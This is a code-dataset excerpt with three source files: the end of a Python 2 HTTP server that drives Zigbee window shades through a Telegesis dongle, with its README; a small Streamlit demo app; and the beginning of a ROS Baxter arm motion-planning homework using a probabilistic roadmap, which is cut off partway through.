\"ACK\" not in dline:\n dline = ser.readline()\n time.sleep(1)\n print dline\n if cont == 1 and \"|\" in dline and \"RFD\" not in dline and eui_dongle not in dline:\n id = dline.split(' | ')[3]\n print id\n device.append(id)\n sousindex += 1\n\n if \"EUI\" in dline:\n cont = 1\n if \"2.\" in dline or \"5.\" in dline or \"8.\" in dline:\n i = 1\n print \"detection 2 5 8\"\n index += 3\n print \"Changement de device: \" + str(index_ident)\n ident = device[index_ident]\n index_ident += 1\n i = 1\n index = 0\n for i in list(set(device)):\n print i\n device_file.write(i + \"\\n\")\n device_file.close()\n\n elif ENDPOINT in qs:\n print(\"Processing command [\" + ENDPOINT + \"]\")\n send_order(\"ATI\\r\")\n oldfile = open(ZIGBEE_DEVICES_PATH, 'r+')\n newfile = open(ZIGBEE_TMP_PATH, 'w')\n for dligne in oldfile:\n dligne = dligne.replace(\"\\r\", \"\")\n dligne = dligne.replace(\"\\n\", \"\")\n ser.write(\"AT+ACTEPDESC:\" + dligne + \",\" + dligne + \"\\r\")\n time.sleep(1)\n dligne = \"\"\n while \"ACK\" not in dligne:\n dligne = ser.readline()\n print dligne\n time.sleep(1)\n if \"ActEpDesc\" in dligne:\n ep = dligne.split(',')[2]\n ep = ep.replace(\"\\r\", \"\")\n ep = ep.replace(\"\\n\", \"\")\n newfile.write(dligne.replace(dligne, dligne + \"|\" + ep + \"\\n\"))\n dligne = \"\"\n oldfile.close()\n newfile.close()\n os.remove(ZIGBEE_DEVICES_PATH)\n shutil.move(ZIGBEE_TMP_PATH, ZIGBEE_DEVICES_PATH)\n\n elif IDENTIFY in qs:\n print(\"Processing command [\" + IDENTIFY + \"]\")\n send_order(\"ATI\\r\")\n oldfile = open(ZIGBEE_DEVICES_PATH, 'r+')\n newfile = open(ZIGBEE_TMP_PATH, 'w')\n for ligne in oldfile:\n ligne = ligne.replace(\"\\r\", \"\")\n ligne = ligne.replace(\"\\n\", \"\")\n input_var = raw_input(\"delai() d'attente pour volet \" + ligne.split('|')[0] + \" en secondes? 
\")\n time.sleep(int(input_var))\n ser.write(\"AT+IDENTIFY:\" + ligne.split('|')[0] + \",\" + ligne.split('|')[1] + \",0,000A\\r\")\n time.sleep(1)\n dline = \"\"\n while OK not in dline:\n dline = ser.readline()\n print dline\n time.sleep(1)\n input_var = raw_input(\"Nom pour ce volet: \")\n newfile.write(ligne.replace(ligne, ligne + \"|\" + input_var + \"\\n\"))\n oldfile.close()\n newfile.close()\n\n elif MOVEUP in qs:\n print(\"Processing command [\" + MOVEUP + \"]\")\n if qs.get('MOVEUP')[0] != ALL:\n device_text = qs.get('MOVEUP')[0]\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n if device_text == dline.split('|')[2]:\n ser.write(\"AT+LCMV:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,1,00,FF\\r\")\n receive = \"\"\n delai()\n while \"DFTREP\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[4] != \"00\":\n print \"Transmit KO to \" + dline.split('|')[2] + \"\\n\"\n else:\n print \"Transmit OK to \" + dline.split('|')[2] + \"\\n\"\n\n else:\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n ser.write(\"AT+LCMV:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,1,00,FF\\r\")\n receive = \"\"\n delai()\n while \"DFTREP\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[4] != \"00\":\n print \"Transmit KO to \" + dline.split('|')[2] + \"\\n\"\n else:\n print \"Transmit OK to \" + dline.split('|')[2] + \"\\n\"\n\n elif MOVEDOWN in qs:\n print(\"Processing command [\" + MOVEDOWN + \"]\")\n if qs.get('MOVEDOWN')[0] != ALL:\n device_text = qs.get(MOVEDOWN)[0]\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n if device_text == dline.split('|')[2]:\n ser.write(\"AT+LCMV:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,1,01,FF\\r\")\n receive = \"\"\n delai()\n while \"DFTREP\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[4] != \"00\":\n print \"Transmit KO to \" + dline.split('|')[2] + \"\\n\"\n else:\n print \"Transmit OK to \" + dline.split('|')[2] + \"\\n\"\n\n else:\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n ser.write(\"AT+RONOFF:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,0\\r\")\n ser.write(\"AT+LCMV:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,1,01,FF\\r\")\n receive = \"\"\n delai()\n while \"DFTREP\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[4] != \"00\":\n print \"Transmit KO to \" + dline.split('|')[2] + \"\\n\"\n else:\n print \"Transmit OK to \" + dline.split('|')[2] + \"\\n\"\n\n elif MOVETO in qs:\n print(\"Processing command [\" + MOVETO + \"]\")\n if qs.get(MOVETO)[0] != ALL:\n level = format_level(int(qs.get(LEVEL)[0]))\n device_text = qs.get(MOVETO)[0]\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n if device_text == dline.split('|')[2]:\n ser.write(\"AT+LCMVTOLEV:\" + dline.split('|')[0] + \",\" + dline.split('|')[\n 1] + \",0,0,\" + level + \",000F\\r\")\n receive = \"\"\n delai()\n while \"DFTREP\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[4] != \"00\":\n print \"Transmit KO to \" + 
dline.split('|')[2] + \"\\n\"\n else:\n print \"Transmit OK to \" + dline.split('|')[2] + \"\\n\"\n\n else:\n level = format_level(int(qs.get(LEVEL)[0]))\n\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n ser.write(\"AT+LCMVTOLEV:\" + dline.split('|')[0] + \",\" + dline.split('|')[\n 1] + \",0,0,\" + level + \",000F\\r\")\n receive = \"\"\n while \"DFTREP\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[4] != \"00\":\n print \"Transmit KO to \" + dline.split('|')[2] + \"\\n\"\n else:\n print \"Transmit OK to \" + dline.split('|')[2] + \"\\n\"\n\n elif STATUS in qs:\n print(\"Processing command [\" + STATUS + \"]\")\n a = 0.00081872\n b = 0.2171167\n c = -8.60201639\n if qs.get(STATUS)[0] == ALL:\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n with eventlet.Timeout(10, False):\n dline = dline.rstrip()\n delai()\n print dline\n ser.write(\n \"AT+READATR:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,0008,0000\\r\")\n receive = \"\"\n print \"1 \" + dline.split('|')[2]\n while OK not in receive:\n receive = ser.readline()\n print receive\n delai()\n\n while (\"RESPATTR\" and dline.split('|')[0]) not in receive:\n receive = ser.readline()\n print receive\n delai()\n print \"2 \" + receive\n receive = receive.rstrip()\n level = int(receive.split(',')[5], 16)\n print level\n level = int(level * level * a + level * b + c)\n if level < 0:\n level = 0\n print dline.split('|')[2] + \" est au niveau \" + str(level) + \" \\n\"\n level = int(level * 32 / 100)\n\n url = SERVER_DOMOTICZ_PROTOCOL + \"://\" + SERVER_DOMOTICZ_IP + \":\" + SERVER_DOMOTICZ_PORT + SERVER_DOMOTICZ_GETTER\n idx = dline.split('|')[3]\n\n if level == 0:\n request = url + \"&idx=\" + idx + \"&nvalue=1\"\n elif level > 31:\n request = url + \"&idx=\" + idx + \"&nvalue=0\"\n else:\n request = url + \"&idx=\" + idx + \"&nvalue=16&svalue=\" + str(level)\n print request\n requests.get(request)\n print \"Suivant\\n\"\n else:\n print \"Un seul Status\\n\"\n device_text = qs.get(STATUS)[0]\n with open(ZIGBEE_DEVICES_PATH) as devices:\n for dline in devices:\n dline = dline.rstrip()\n if device_text == dline.split('|')[2]:\n ser.write(\n \"AT+READATR:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,0006,0000\\r\")\n receive = \"\"\n while \"RESPATTR\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n if receive.split(',')[5] != \"00\":\n print dline.split('|')[2] + \" est ouvert. Niveau: \"\n else:\n print dline.split('|')[2] + \" est ferme. 
Niveau: \"\n ser.write(\n \"AT+READATR:\" + dline.split('|')[0] + \",\" + dline.split('|')[1] + \",0,0008,0000\\r\")\n receive = \"\"\n delai()\n while \"RESPATTR\" not in receive:\n receive = ser.readline()\n print receive\n delai()\n receive = receive.rstrip()\n level = int(receive.split(',')[5], 16)\n level = int(level * level * a + level * b + c)\n print str(level) + \" \\n\"\n if level < 0:\n level = 0\n level = int(level * 32 / 100)\n level = 32 - level\n\n elif DIRECT in qs:\n print(\"Processing command [DIRECT]\")\n send_order(\"ATI\\r\")\n ser.write(qs.get(DIRECT)[0] + \"\\r\")\n time.sleep(1)\n while 1:\n dline = ser.readline()\n print dline\n\n else:\n print(\"Unrecognized command\")\n print '------------------------------------------'\n\n return\n\n\nif __name__ == \"__main__\":\n try:\n send_order(\"ATI\\r\")\n server = HTTPServer((SERVER_ZIGBEE_IP, int(SERVER_ZIGBEE_PORT)), ZigbeeServer)\n print(\"Started Zigbee HTTP server - \" + time.asctime())\n server.serve_forever()\n except KeyboardInterrupt:\n print('Shutting down Zigbee HTTP server')\n print(\"Shutting down Zigbee HTTP server - \" + time.asctime())\n server.socket.close()\n ser.close()\n sys.exit()\n"
},
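`format_level` above converts a 0-100 percentage into the hex byte the Telegesis dongle expects, via a quadratic calibration curve. The same function in isolation, with the constants taken from the record:

```python
def format_level(level: int) -> str:
    a, b, c = -0.0084, 3.04, 35.0       # calibration constants from the record
    raw = int(a * level * level + b * level + c)
    return format(raw, '02X')           # at-least-two-digit uppercase hex

print(format_level(0))    # -> '23' (decimal 35)
print(format_level(100))  # close to 'FF'; the curve maps 0-100 onto roughly 0x23-0xFF
```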
{
"alpha_fraction": 0.7229390740394592,
"alphanum_fraction": 0.7623655796051025,
"avg_line_length": 28.680850982666016,
"blob_id": "c521be59029d2a9bb7ed661b57cb5e1ab625b7d9",
"content_id": "69e74cc616f9b9129803ad73b34b6c66988dd54f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2792,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 94,
"path": "/README.md",
"repo_name": "hakaesbe/zigbee_server.py",
"src_encoding": "UTF-8",
"text": "# zigbee_server.py\nWeb server to manage zigbee shades\nThis program is provided \"as is\" and has been developped to work with Telegesis Zigbee USB Dongle (ETRX357 USB) using a CICIE Home Automation firmware connected to a Raspberry Pi.\nIt has been coded to work with Domoticz but can be easily adapted to work with other system: the program act itself as a web server listening for command on port 1234\n\n## REQUIREMENTS\n\n* Python 2.7\n\nThe list of dependencies are listed in `./requirements.txt` \n\n## INSTALL\n\nFirst install the required packages:\n\n`pip install -r requirements.txt`\n\nYou can then adapt config.cfg with your server configuration.\n\n# Supported command\n* INIT\n* INFO\n* RESET\n* JOIN\n* NETINFO\n* DISCOVER\n* ENDPOINT\n* IDENTIFY\n* MOVEUP\n* MOVEDOWN\n* MOVETO\n* STATUS\n* DIRECT\n\n# Error code from https://www.silabs.com\n* 00 Everything OK - Success\n* 01 Couldn’t poll Parent because of Timeout\n* 02 Unknown command\n* 04 Invalid S-Register\n* 05 Invalid parameter\n* 06 Recipient could not be reached\n* 07 Message was not acknowledged\n* 08 No sink known\n* 09 Address Table entry is in use and cannot be modified\n* 0A Message could not be sent\n* 0B Local node is not sink\n* 0C Too many characters\n* 0E Background Scan in Progress (Please wait and try again)\n* 0F Fatal error initialising the network\n* 10 Error bootloading\n* 12 Fatal error initialising the stack\n* 18 Node has run out of Buffers\n* 19 Trying to write read-only register\n* 1A Data Mode Refused by Remote Node\n* 1B Connection Lost in Data Mode\n* 1C Remote node is already in Data Mode\n* 20 Invalid password\n* 25 Cannot form network\n* 27 No network found\n* 28 Operation cannot be completed if node is part of a PAN\n* 2C Error leaving the PAN\n* 2D Error scanning for PANs\n* 33 No response from the remote bootloader\n* 34 Target did not respond during cloning\n* 35 Timeout occurred during xCASTB\n* 39 MAC Transmit Queue is Full\n* 6C Invalid Binding Index\n* 70 Invalid Operation\n* 72 More than 10 unicast messages were in flight at the same time\n* 74 Message too long\n* 80 ZDP Invalid Request Type\n* 81 ZDP Device not Found\n* 82 ZDP Invalid Endpoint\n* 83 ZDP Not Active\n* 84 ZDP Not Supported\n* 85 ZDP Timeout\n* 86 ZDP No Match\n* 87 ZDP Table Full\n* 88 ZDP No Entry\n* 89 ZDP No Descriptor\n* 91 Operation only possible if connected to a PAN\n* 93 Node is not part of a Network\n* 94 Cannot join network\n* 96 Mobile End Device Move to new Parent Failed\n* 98 Cannot join ZigBee 2006 Network as Router\n* A1 More than 8 broadcasts were sent within 8 seconds\n* AB Trying to join, but no beacons could be heard\n* AC Network key was sent in the clear when trying to join secured\n* AD Did not receive Network Key\n* AE No Link Key received\n* AF Preconfigured Key Required\n* C5 NWK Already Present\n* C7 NWK Table Full\n* C8 NWK Unknown Device\n"
}
] | 3 |
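As the README notes, the server is driven purely by HTTP query strings. A client therefore needs nothing beyond `requests`; a sketch (the host address and the shade name are assumptions, the command names come from the code above):

```python
import requests

BASE = "http://127.0.0.1:1234/"   # assumed address of a running zigbee_server.py

requests.get(BASE, params={"MOVEUP": "ALL"})                     # open every shade
requests.get(BASE, params={"MOVETO": "kitchen", "LEVEL": "50"})  # assumed shade name
requests.get(BASE, params={"STATUS": "ALL"})                     # push levels to Domoticz
```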
Srouek/Algo
|
https://github.com/Srouek/Algo
|
94bbbfd72031f01d09ba656a2bfb2c988fab772e
|
3f0a2444d45580260fb086f706bc9449ea11727d
|
afd684688f77d42c99e7e62450a1aaff365c55d5
|
refs/heads/main
| 2023-01-14T06:58:37.059189 | 2020-11-18T10:21:29 | 2020-11-18T10:21:29 | 301,979,309 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7198879718780518,
"alphanum_fraction": 0.7198879718780518,
"avg_line_length": 25.30769157409668,
"blob_id": "a92393f9e3546a253ca80337108f1c21f1d335ba",
"content_id": "4668c8f40da21b456786ce883fc6995d85f640a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 357,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 13,
"path": "/app.py",
"repo_name": "Srouek/Algo",
"src_encoding": "UTF-8",
"text": "import streamlit as st\r\nimport pandas as pd\r\nimport numpy as np \r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\nst.title(\"Streamlit Crash course\")\r\nst.header(\"Simple Header\")\r\nst.subheader(\"Another sub header\")\r\nst.sidebar.header(\"Example de Side Bar\")\r\nst.sidebar.text(\"Hello\")\r\nst.text(\"For a simple text\")\r\nst.markdown(\"#### A Markdown \")\r\n\r\n"
}
] | 1 |
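`app.py` imports pandas, numpy, seaborn and matplotlib without using them; a natural next step in such a crash course is rendering a figure with `st.pyplot`. A sketch of that step (not part of the repository):

```python
import streamlit as st
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt

df = pd.DataFrame({"x": np.arange(50), "y": np.random.randn(50).cumsum()})
fig, ax = plt.subplots()
sns.lineplot(data=df, x="x", y="y", ax=ax)  # draw onto the Matplotlib axes
st.pyplot(fig)                              # render the figure inside the app
```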
MengyuWu/robotics
|
https://github.com/MengyuWu/robotics
|
fbdae2c29c3c39a968939026deea4f212121b171
|
41b75353b5c4302b984ecaba7f625b5cba3f73c4
|
692afff2f14175f385fa1716a439579b1183b843
|
refs/heads/master
| 2015-08-19T06:47:46.675232 | 2015-01-26T00:01:34 | 2015-01-26T00:01:34 | 29,205,379 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6012992858886719,
"alphanum_fraction": 0.6157545447349548,
"avg_line_length": 41.839759826660156,
"blob_id": "798f11e784fa31dd47eb10e98a82ae498a83b735",
"content_id": "3a5eaff0a7b5c194a9be59f47477635a2faf42b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 35558,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 830,
"path": "/Baster Robot motion planning/hw3.py",
"repo_name": "MengyuWu/robotics",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom copy import deepcopy\nimport math\nimport numpy\nimport random\nfrom threading import Thread, Lock\nimport sys\n\nimport actionlib\nimport control_msgs.msg\nimport geometry_msgs.msg\nfrom interactive_markers.interactive_marker_server import *\nfrom interactive_markers.menu_handler import *\nimport moveit_commander\nimport moveit_msgs.msg\nimport moveit_msgs.srv\nimport rospy\nimport sensor_msgs.msg\nimport tf\nimport trajectory_msgs.msg\nfrom visualization_msgs.msg import InteractiveMarkerControl\nfrom visualization_msgs.msg import Marker\n#--------------------extra credit--------------------\nimport matplotlib.pyplot as plt\nimport time\n#------------mode select------------------\nuse_RRT=False\n\ndef convert_to_message(T):\n t = geometry_msgs.msg.Pose()\n position = tf.transformations.translation_from_matrix(T)\n orientation = tf.transformations.quaternion_from_matrix(T)\n t.position.x = position[0]\n t.position.y = position[1]\n t.position.z = position[2]\n t.orientation.x = orientation[0]\n t.orientation.y = orientation[1]\n t.orientation.z = orientation[2]\n t.orientation.w = orientation[3] \n return t\n\ndef convert_from_message(msg):\n R = tf.transformations.quaternion_matrix((msg.orientation.x,\n msg.orientation.y,\n msg.orientation.z,\n msg.orientation.w))\n T = tf.transformations.translation_matrix((msg.position.x, \n msg.position.y, \n msg.position.z))\n return numpy.dot(T,R)\n\nclass RRTNode(object):\n def __init__(self):\n self.q=numpy.zeros(7)\n self.parent = None\n\nclass MoveArm(object):\n\n def __init__(self):\n print \"HW3 initializing...\"\n # Prepare the mutex for synchronization\n self.mutex = Lock()\n\n # min and max joint values are not read in Python urdf, so we must hard-code them here\n self.q_min = []\n self.q_max = []\n self.q_min.append(-1.700);self.q_max.append(1.700)\n self.q_min.append(-2.147);self.q_max.append(1.047)\n self.q_min.append(-3.054);self.q_max.append(3.054)\n self.q_min.append(-0.050);self.q_max.append(2.618)\n self.q_min.append(-3.059);self.q_max.append(3.059)\n self.q_min.append(-1.570);self.q_max.append(2.094)\n self.q_min.append(-3.059);self.q_max.append(3.059)\n\n # Subscribes to information about what the current joint values are.\n rospy.Subscriber(\"robot/joint_states\", sensor_msgs.msg.JointState, self.joint_states_callback)\n\n # Initialize variables\n self.q_current = []\n self.joint_state = sensor_msgs.msg.JointState()\n\n # Create interactive marker\n self.init_marker()\n\n # Connect to trajectory execution action\n self.trajectory_client = actionlib.SimpleActionClient('/robot/limb/left/follow_joint_trajectory', \n control_msgs.msg.FollowJointTrajectoryAction)\n self.trajectory_client.wait_for_server()\n print \"Joint trajectory client connected\"\n\n # Wait for moveit IK service\n rospy.wait_for_service(\"compute_ik\")\n self.ik_service = rospy.ServiceProxy('compute_ik', moveit_msgs.srv.GetPositionIK)\n print \"IK service ready\"\n\n # Wait for validity check service\n rospy.wait_for_service(\"check_state_validity\")\n self.state_valid_service = rospy.ServiceProxy('check_state_validity', \n moveit_msgs.srv.GetStateValidity)\n print \"State validity service ready\"\n\n # Initialize MoveIt\n self.robot = moveit_commander.RobotCommander()\n self.scene = moveit_commander.PlanningSceneInterface()\n self.group = moveit_commander.MoveGroupCommander(\"left_arm\") \n print \"MoveIt! 
interface ready\"\n\n # How finely to sample each joint\n self.q_sample = [0.1, 0.1, 0.2, 0.2, 0.4, 0.4, 0.4]\n self.joint_names = [\"left_s0\", \"left_s1\",\n \"left_e0\", \"left_e1\",\n \"left_w0\", \"left_w1\",\"left_w2\"]\n\n # Options\n self.subsample_trajectory = True\n self.spline_timing = True\n\n print \"Initialization done.\"\n\n\n def control_marker_feedback(self, feedback):\n pass\n\n def get_joint_val(self, joint_state, name):\n if name not in joint_state.name:\n print \"ERROR: joint name not found\"\n return 0\n i = joint_state.name.index(name)\n return joint_state.position[i]\n\n def set_joint_val(self, joint_state, q, name):\n if name not in joint_state.name:\n print \"ERROR: joint name not found\"\n i = joint_state.name.index(name)\n joint_state.position[i] = q\n\n \"\"\" Given a complete joint_state data structure, this function finds the values for \n a particular set of joints in a particular order (in our case, the left arm joints ordered\n from proximal to distal) and returns a list q[] containing just those values.\n \"\"\"\n def q_from_joint_state(self, joint_state):\n q = []\n q.append(self.get_joint_val(joint_state, \"left_s0\"))\n q.append(self.get_joint_val(joint_state, \"left_s1\"))\n q.append(self.get_joint_val(joint_state, \"left_e0\"))\n q.append(self.get_joint_val(joint_state, \"left_e1\"))\n q.append(self.get_joint_val(joint_state, \"left_w0\"))\n q.append(self.get_joint_val(joint_state, \"left_w1\"))\n q.append(self.get_joint_val(joint_state, \"left_w2\"))\n return q\n\n \"\"\" Given a list q[] of joint values and an already populated joint_state, this function assumes \n that the passed in values are for a particular set of joints in a particular order (in our case,\n the left arm joints ordered from proximal to distal) and edits the joint_state data structure to\n set the values to the ones passed in.\n \"\"\"\n def joint_state_from_q(self, joint_state, q):\n self.set_joint_val(joint_state, q[0], \"left_s0\")\n self.set_joint_val(joint_state, q[1], \"left_s1\")\n self.set_joint_val(joint_state, q[2], \"left_e0\")\n self.set_joint_val(joint_state, q[3], \"left_e1\")\n self.set_joint_val(joint_state, q[4], \"left_w0\")\n self.set_joint_val(joint_state, q[5], \"left_w1\")\n self.set_joint_val(joint_state, q[6], \"left_w2\") \n\n \"\"\" Creates simple timing information for a trajectory, where each point has velocity\n and acceleration 0 for all joints, and all segments take the same amount of time\n to execute.\n \"\"\"\n def compute_simple_timing(self, q_list, time_per_segment):\n v_list = [numpy.zeros(7) for i in range(0,len(q_list))]\n a_list = [numpy.zeros(7) for i in range(0,len(q_list))]\n t = [i*time_per_segment for i in range(0,len(q_list))]\n return v_list, a_list, t\n\n \"\"\" This function will perform IK for a given transform T of the end-effector. It returs a list q[]\n of 7 values, which are the result positions for the 7 joints of the left arm, ordered from proximal\n to distal. 
If no IK solution is found, it returns an empy list.\n \"\"\"\n def IK(self, T_goal):\n req = moveit_msgs.srv.GetPositionIKRequest()\n req.ik_request.group_name = \"left_arm\"\n req.ik_request.robot_state = moveit_msgs.msg.RobotState()\n req.ik_request.robot_state.joint_state = self.joint_state\n req.ik_request.avoid_collisions = True\n req.ik_request.pose_stamped = geometry_msgs.msg.PoseStamped()\n req.ik_request.pose_stamped.header.frame_id = \"base\"\n req.ik_request.pose_stamped.header.stamp = rospy.get_rostime()\n req.ik_request.pose_stamped.pose = convert_to_message(T_goal)\n req.ik_request.timeout = rospy.Duration(3.0)\n res = self.ik_service(req)\n q = []\n if res.error_code.val == res.error_code.SUCCESS:\n q = self.q_from_joint_state(res.solution.joint_state)\n return q\n\n \"\"\" This function checks if a set of joint angles q[] creates a valid state, or one that is free\n of collisions. The values in q[] are assumed to be values for the joints of the left arm, ordered\n from proximal to distal. \n \"\"\"\n def is_state_valid(self, q):\n req = moveit_msgs.srv.GetStateValidityRequest()\n req.group_name = \"left_arm\"\n current_joint_state = deepcopy(self.joint_state)\n current_joint_state.position = list(current_joint_state.position)\n self.joint_state_from_q(current_joint_state, q)\n req.robot_state = moveit_msgs.msg.RobotState()\n req.robot_state.joint_state = current_joint_state\n res = self.state_valid_service(req)\n return res.valid\n \"\"\" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n this function checks points on segment. If all the points (every 0.1) are valid, then this segment will be valid.\n ths inputs are two vectors: segment start point and segment end point.\n \"\"\"\n def is_valid_segment(self,startpoint,endpoint):\n\tsegment=endpoint-startpoint\n\tsegment_norm=numpy.linalg.norm(segment)\n\tif segment_norm<0.1:\n\t if (self.is_state_valid(startpoint)) and (self.is_state_valid(startpoint)):\n\t\treturn True\n\t else:\n\t\treturn False\n n=int(round(segment_norm/0.1))\n\tn=n+1 #make sure that the distance between every points <0.1\n\tv=segment/n #each time increase vector v\n\tfor i in range(0,n+1): # 0~n\n\t testpoint=startpoint+i*v\n\t if not (self.is_state_valid(testpoint)):\n\t\treturn False\n\treturn True\n \n \"\"\" This is the main function to be filled in for HW3.\n Parameters:\n - q_start: the start configuration for the arm\n - q_goal: the goal configuration for the arm\n - q_min and q_max: the min and max values for all the joints in the arm.\n All the above parameters are arrays. Each will have 7 elements, one for each joint in the arm.\n These values correspond to the joints of the arm ordered from proximal (closer to the body) to \n distal (further from the body). \n\n The function must return a trajectory as a tuple (q_list,v_list,a_list,t).\n If the trajectory has n points, then q_list, v_list and a_list must all have n entries. Each\n entry must be an array of size 7, specifying the position, velocity and acceleration for each joint.\n\n For example, the i-th point of the trajectory is defined by:\n - q_list[i]: an array of 7 numbers specifying position for all joints at trajectory point i\n - v_list[i]: an array of 7 numbers specifying velocity for all joints at trajectory point i\n - a_list[i]: an array of 7 numbers specifying acceleration for all joints at trajectory point i\n Note that q_list, v_list and a_list are all lists of arrays. 
\n For example, q_list[i][j] will be the position of the j-th joint (0<j<7) at trajectory point i \n (0 < i < n).\n\n For example, a trajectory with just 2 points, starting from all joints at position 0 and \n ending with all joints at position 1, might look like this:\n\n q_list=[ numpy.array([0, 0, 0, 0, 0, 0, 0]),\n numpy.array([1, 1, 1, 1, 1, 1, 1]) ]\n v_list=[ numpy.array([0, 0, 0, 0, 0, 0, 0]),\n numpy.array([0, 0, 0, 0, 0, 0, 0]) ]\n a_list=[ numpy.array([0, 0, 0, 0, 0, 0, 0]),\n numpy.array([0, 0, 0, 0, 0, 0, 0]) ]\n \n Note that the trajectory should always begin from the current configuration of the robot.\n Hence, the first entry in q_list should always be equal to q_start. \n\n In addition, t must be a list with n entries (where n is the number of points in the trajectory).\n For the i-th trajectory point, t[i] must specify when this point should be reached, relative to\n the start of the trajectory. As a result t[0] should always be 0. For the previous example, if we\n want the second point to be reached 10 seconds after starting the trajectory, we can use:\n\n t=[0,10]\n\n When you are done computing all of these, return them using\n\n return q_list,v_list,a_list,t\n\n In addition, you can use the function self.is_state_valid(q_test) to test if the joint positions \n in a given array q_test create a valid (collision-free) state. q_test will be expected to \n contain 7 elements, each representing a joint position, in the same order as q_start and q_goal.\n \"\"\"\n def motion_plan(self, q_start, q_goal, q_min, q_max):\n # ---------------- replace this with your code -----v4-------------\n #-----------PRM----------------------------\n if (use_RRT==False):\n\t T=60\n infinite=float(\"inf\")\n path=[]\n min_dist_from_start_goal=infinite\n\t connectstart=False\n connectgoal=False\n\t #creat a map, key(conver point to a string), value: the point\n strmap={}\n # adjmap : adjacent pointlist for each point, adjdistmap: adjacent point distance to each point\n adjmap={}\n adjdistmap={}\n\t #add start and goal in hashmaps\n\t #print \"q_start\",q_start\n\t #print \"q_goal\",q_goal\n strmap[str(numpy.asarray(q_start))]=numpy.asarray(q_start)\n strmap[str(numpy.asarray(q_goal))]=numpy.asarray(q_goal)\n\t adjmap[str(numpy.asarray(q_start))]=[]\n adjmap[str(numpy.asarray(q_goal))]=[]\n adjdistmap[str(numpy.asarray(q_start))]=[]\n adjdistmap[str(numpy.asarray(q_goal))]=[]\n\t starttime=time.time()\n currenttime=starttime\n prevpart2time=starttime\n\t #plot\n\t taxis=[]\n\t y=[]\n\t #fisrt check the start point, if it is on obstacle should restart it\n\t if(not self.is_state_valid(q_start)):\n\t print \"start point is on obstacle, please remove the obstacle and restart\"\n\t\tq_list=[]\n\t q_list.append(q_start)\n\t v_list,a_list,t = self.compute_simple_timing(q_list, 10) \n\t return q_list, v_list, a_list, t\n #part1--------------------------------------\n while (currenttime-starttime<T):\n\t\tprint \"currenttime-starttime\",currenttime-starttime\n\t\t#create random node\n\t randomNode=numpy.zeros(7)\n for i in range(0,7):\n\t\t randomNode[i]=q_min[i]+(q_max[i]-q_min[i])*random.random()\n\t\t#if this point is valid, then add to the roadmap\n\t\tif(self.is_state_valid(randomNode)):\n\t\t #print \"randomNode\",randomNode\n\t\t randomNode=numpy.asarray(randomNode)\n\t strmap[str(randomNode)]=randomNode\n\t\t adjmap[str(randomNode)]=[]\n\t\t adjdistmap[str(randomNode)]=[]\n\t\t for k in adjmap:\n\t\t\tif(k!=str(randomNode) and self.is_valid_segment(randomNode,strmap[k])): # if this randomnode 
could connect to the other point\n\t\t\t dist=numpy.linalg.norm(randomNode-strmap[k])\n\t\t adjmap[k].append(randomNode)\n\t\t\t adjdistmap[k].append(dist)\n\t\t\t adjmap[str(randomNode)].append(strmap[k])\n\t\t\t adjdistmap[str(randomNode)].append(dist)\n\t\t if (self.is_valid_segment(randomNode,q_start)): connectstart=True\n\t\t if (self.is_valid_segment(randomNode,q_goal)): connectgoal=True\n\t\t#print \"strmap\",strmap\n\t\t#print \"adjmap\",adjmap\n\t\t#print \"adjdistmap\",adjdistmap\n\t\t#part2---------------------------------------------------------------------------------\n\t\tcurrenttime=time.time()\n\t\tif (connectstart==True and connectgoal==True and (currenttime-prevpart2time)>=1):\n\t\t #every one second\n\t\t prevpart2time=time.time()\n\t\t visitmap={}\n\t\t disttostartmap={}\n\t\t prevnodemap={}\n\t\t #initilization\n\t\t for k in strmap:\n\t\t visitmap[k]=False\n\t\t\tdisttostartmap[k]=infinite\n\t\t\tprevnodemap[k]=\"\"\n\t\t disttostartmap[str(numpy.asarray(q_start))]=0.0\n\t\t arr=[] #content: point list (minimun heap)\n\t\t 